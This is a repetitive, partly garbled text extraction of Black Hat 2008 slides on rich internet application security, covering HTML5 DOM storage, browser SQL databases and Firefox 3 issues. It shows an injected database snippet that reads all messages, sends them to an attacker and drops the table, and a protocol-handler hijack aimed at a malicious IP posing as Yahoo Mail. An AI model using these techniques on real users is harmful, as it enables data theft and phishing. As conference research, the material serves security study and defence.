The standards-based approach
Introduces DOM storage sessionStorage andlocalStorage
sessionStorage stores arbitrary amounts of data for a singlesessionlocalStorage persists beyond the session never expires,limited to 5M
Database storage via openDatabase()
All expected to be same-origin
Living in theRIA World
HTML 5New features in Firefox and WebKit
http://find/ -
7/29/2019 Ria World Bh 2008
119/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
The standards-based approach
Introduces DOM storage sessionStorage andlocalStorage
sessionStorage stores arbitrary amounts of data for a single
sessionlocalStorage persists beyond the session never expires,limited to 5M
Database storage via openDatabase()
All expected to be same-origin
Living in theRIA World
HTML 5New features in Firefox and WebKit
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
120/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
The standards-based approach
Introduces DOM storage sessionStorage andlocalStorage
sessionStorage stores arbitrary amounts of data for a single
sessionlocalStorage persists beyond the session never expires,limited to 5M
Database storage via openDatabase()
All expected to be same-origin
Living in theRIA World
HTML 5New features in Firefox and WebKit
http://find/ -
7/29/2019 Ria World Bh 2008
121/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
The standards-based approach
Introduces DOM storage sessionStorage andlocalStorage
sessionStorage stores arbitrary amounts of data for a single
sessionlocalStorage persists beyond the session never expires,limited to 5M
Database storage via openDatabase()
All expected to be same-origin
Living in theRIA World
DOM Storage
http://find/ -
7/29/2019 Ria World Bh 2008
122/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
The major goals of DOM storage more storage spaceand real persistence
Cookies considered too small
Users delete cookies, or wont accept them
DOM storage bypasses pesky users
However, pesky users can use:
about:config dom.storage.enabled = false
Living in theRIA World
Browser-based SQL DatabasesDatabaseJacking
http://find/ -
7/29/2019 Ria World Bh 2008
123/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Injection attacks become far more damaging when you caninsert code like this:
v a r db=o p e n D a t a b a s e ( " e - m a i l " , [ ] , " M y p r ec i ou s e - m ai l " , " 3 . 1 4 " ) ;
a l l m e s s a g e s=db . e x e c u t e S q l ( " S E LE CT * F RO M M SG S " , [ ] , f u n c t i o n ( r e s u l t s ) {s e n d T o A t t a c k e r ( r e s u l t s ) ; }
) ;
db . e x e c u t e S q l ( " D R OP T AB L E M E SS A GE S " , [ ] , f u n c t i o n ( ) {a l e r t ( " l o l " ) ; }
) ;
Living in theRIA World
Firefox 3Mozilla-specific issues
http://find/ -
7/29/2019 Ria World Bh 2008
124/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Cross-Site XMLHttpRequest removed in late FF3betas, but it may return
globalStorage
FF2 has weak same-origin restrictions
FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage
The RIA world is totally SQL-happy
Downloads, cookies, form history, search history, etc, allstored in local SQLite databases
Why?? This data isnt relational.
Living in theRIA World
Firefox 3Mozilla-specific issues
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
125/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Cross-Site XMLHttpRequest removed in late FF3betas, but it may return
globalStorage
FF2 has weak same-origin restrictions
FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage
The RIA world is totally SQL-happy
Downloads, cookies, form history, search history, etc, allstored in local SQLite databases
Why?? This data isnt relational.
Living in theRIA World
Firefox 3Mozilla-specific issues
http://find/ -
7/29/2019 Ria World Bh 2008
126/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Cross-Site XMLHttpRequest removed in late FF3betas, but it may return
globalStorage
FF2 has weak same-origin restrictions
FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage
The RIA world is totally SQL-happy
Downloads, cookies, form history, search history, etc, allstored in local SQLite databases
Why?? This data isnt relational.
Living in theRIA World
Firefox 3Additional fun
S ki f t ki d d t t
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
127/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Speaking of tracking and data storage. . .
Did you have History turned off? FF3 may have turned itback on.
Also new in FF3: nsIdleService idle tracking through
XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.
Websites can now be protocol handlers a novel way toimplement spyware
Living in theRIA World
Firefox 3Additional fun
S ki f t ki d d t t
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
128/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Speaking of tracking and data storage. . .
Did you have History turned off? FF3 may have turned itback on.
Also new in FF3: nsIdleService idle tracking through
XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.
Websites can now be protocol handlers a novel way toimplement spyware
Living in theRIA World
I d i
Firefox 3Additional fun
S eaki of t acki a d data sto a e
http://find/ -
7/29/2019 Ria World Bh 2008
129/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Speaking of tracking and data storage. . .
Did you have History turned off? FF3 may have turned itback on.
Also new in FF3: nsIdleService idle tracking through
XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.
Websites can now be protocol handlers a novel way toimplement spyware
Living in theRIA World
I t d ti
Firefox 3Protocol Handlers
Set up a dumb proxy forwarding traffic to the real handler
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
130/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlusMozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)
Register a new protocol handler thusly:
n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p
: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;
Use your malicious IP instead of a name, users wont knowthe difference
The only security restriction is that the handler has togo to the domain trying to install it.
Living in theRIA World
Introduction
Firefox 3Protocol Handlers
Set up a dumb proxy forwarding traffic to the real handler
http://find/ -
7/29/2019 Ria World Bh 2008
131/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlusMozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)
Register a new protocol handler thusly:
n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p
: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;
Use your malicious IP instead of a name, users wont knowthe difference
The only security restriction is that the handler has togo to the domain trying to install it.
Living in theRIA World
Introduction
Firefox 3Protocol Handlers
Set up a dumb proxy forwarding traffic to the real handler
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
132/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlusMozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)
Register a new protocol handler thusly:
n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p
: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;
Use your malicious IP instead of a name, users wont knowthe difference
The only security restriction is that the handler has togo to the domain trying to install it.
Living in theRIA World
Introduction
Firef